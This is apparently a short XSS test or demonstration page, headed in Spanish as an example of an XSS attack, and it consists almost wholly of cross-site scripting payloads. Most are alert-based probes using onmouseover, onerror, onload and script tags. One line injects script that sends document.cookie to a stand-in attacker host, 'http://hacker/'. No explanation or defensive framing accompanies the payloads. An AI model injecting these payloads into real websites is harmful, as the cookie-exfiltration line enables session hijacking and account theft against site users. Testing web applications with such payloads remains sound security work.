Ejemplo de ataque de XSS
<b onmouseover=alert(1)>click me!</b>
Blushing Buzzard
<b onmouseover=alert(1)>click me!</b>
<title>Example document: XSS Doc</title>
"><SCRIPT>var+img=new+Image();img.src="http://hacker/"%20+%20document.cookie;</SCRIPT>
<script>alert(1);</script>
<img src="X" onerror=alert(1);>
<body onload=alert('test1')>